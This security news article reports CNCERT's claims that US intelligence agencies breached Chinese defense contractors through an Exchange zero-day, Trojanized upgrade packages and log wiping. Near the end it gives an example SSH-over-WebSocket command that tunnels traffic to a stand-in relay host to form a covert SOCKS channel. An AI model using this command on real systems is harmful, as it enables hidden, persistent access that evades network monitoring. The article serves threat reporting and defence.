CNCERT Accuses of US Intelligence Agencies Attacking Chinese Military-Industrial Units

Since mid-2022, Chinese military-industrial networks have reportedly been the target of highly sophisticated cyber intrusions attributed to US intelligence agencies.

These campaigns exploited previously unknown vulnerabilities to install stealthy malware, maintain prolonged access, and exfiltrate sensitive defense data.

Initially identified following an NSA breach at Northwestern Polytechnical University, the latest incidents uncovered by CNCERT illustrate a relentless focus on China’s defense manufacturing and research establishments.

Emerging in July 2022, the primary malware family exploited a zero-day flaw in Microsoft Exchange servers. Attackers breached an email system within a major military contractor and established persistence for nearly a year.

By leveraging an internal domain controller as a springboard, the intrusion team performed lateral movement to compromise over fifty core hosts.

CNCERT analysts noted that the operators deployed obfuscated payloads, tunneled via WebSocket-wrapped SSH sessions, and routed traffic through relay nodes in Germany and Finland to evade network monitoring.

In a second wave between July and November 2024, adversaries targeted an electronic file system vulnerability across over 300 devices in a supplier’s production environment.

Through compromised Romanian and Dutch IP addresses, they manipulated Tomcat service filters to implant Trojanized upgrade packages.

These bespoke Trojans executed keyword searches for “secret work” and “core network,” harvesting proprietary architectural diagrams and protocol specifications.

CNCERT researchers identified this campaign’s hallmark stealth techniques, including dynamic log wiping and active reconnaissance of defense-specific intrusion detection systems.

Following these disclosures, recent talks between the Cyberspace Administration of China and Nvidia underscored the critical importance of supply-chain security.

Authorities emphasized the risks of reliance on foreign-sourced hardware and software components that may carry pre-installed backdoors.

Covert Channel and Persistence Tactics

One defining characteristic of the Exchange-based intrusions is the custom WebSocket over SSH covert channel. After initial foothold, operators executed a user-space SSH daemon disguised as a messaging service.

The daemon listens on port 80 for WebSocket handshake requests. Once established, encrypted payloads traverse this tunnel, enabling bidirectional command and control without triggering typical SSH or HTTPS alerts. A simplified example of the listener setup might resemble:

ssh -o ProxyCommand="websocat ws-connect://relay.example.net:443" 
    -N -D localhost:1080 -i /path/to/obf_key.pem

This command spins up a SOCKS proxy on the compromised host, funneling all traffic through a remote relay. By obfuscating SSH within standard WebSocket frames, the attackers maintained covert, long-term access to mission-critical networks without detection.

Integrate ANY.RUN TI Lookup with your SIEM or SOAR To Analyses Advanced Threats -> Try 50 Free Trial Searches